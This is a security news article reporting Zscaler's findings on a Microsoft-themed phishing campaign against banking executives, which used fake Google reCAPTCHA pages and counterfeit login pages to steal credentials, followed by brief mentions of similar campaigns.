Phishing Attack Uses Fake Google reCAPTCHA
Zscaler Says It Prevented Over 2,500 Phishing Attacks
A Microsoft-themed phishing campaign is using phony Google reCAPTCHA in an attempt to steal credentials from senior employees of various organizations, a new report by security firm Zscaler
says. The company says it prevented more than 2,500 phishing emails tied to the campaign.
See Also: Illumination Summit: Poker & Cybersecurity: A Game of Skill, Not Luck
Zscaler’s threat research team, ThreatLabZ, which identified the latest campaign, notes the phishing attack has been active since December 2020 and mainly targeted senior employees in the banking sector.
Attack Tactics
The campaign begins with attackers sending victims phishing emails that appear to come from a unified communications system used for streamlining corporate communication. This email contains a malicious email attachment.
Once the victims open the attached HTML file, they are redirected to a .xyz phishing domain which is disguised as a legitimate Google reCAPTCHA page in order to trick the users.
After the reCAPTCHA is verified, the victims are send to a fake Microsoft login phishing page. Once the victims have entered their login credentials on the attackers’ site, a fake message “validation successful,” is prompted to add legitimacy to the campaign.
“These attacks can be categorized as BEC [business email compromise] although the sender, in this case, involves use of popular unified communication systems used by the organizations,” Gayathri Anbalagan, the lead researcher on the Zscaler study points out. “We are not able to attribute this campaign to a specific threat actor, but looking at the operational theme and the target profiles, it is likely to be a single coordinated campaign.”
Social Engineering Campaign
Since the pandemic began, hackers have been relying on advanced social engineering tactics for credential theft.
In January, security firm Trend Micro uncovered a targeted phishing campaign that used a fake Microsoft Office 365 update to steal email credentials from business executives (see: Phishing Campaign Features Fake Office 365 Update).
In August 2020, Trend Micro uncovered a business email compromise scam that targeted the Office 365 accounts of business executives at more than 1,000 companies worldwide (see: BEC Scam Targets Executives’ Office 365 Accounts).
In July 2020, a report by security firm Abnormal Security found hackers were mimicking automated messages from Microsoft SharePoint for a phishing campaign that attempts to steal Office 365 credentials (see: Phishing Campaign Uses Fake SharePoint Alerts).